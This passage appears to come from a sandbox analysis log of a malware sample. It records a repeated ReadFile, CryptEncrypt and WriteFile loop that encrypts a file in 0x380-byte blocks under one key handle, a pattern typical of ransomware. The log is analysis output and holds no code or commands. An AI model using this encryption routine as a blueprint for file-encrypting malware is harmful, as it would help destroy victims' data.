lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.505] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.505] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.505] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.506] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.506] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.506] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.506] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.506] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.506] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.507] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.507] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.507] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.507] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.507] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.508] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.508] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.508] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.508] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.508] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.508] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.509] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.509] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.509] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.509] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.510] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.510] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.510] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.510] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.510] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.510] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.511] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.511] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.511] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.511] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.512] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.512] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.512] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.512] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.512] ReadFile (in: hFile=0x5d3c, 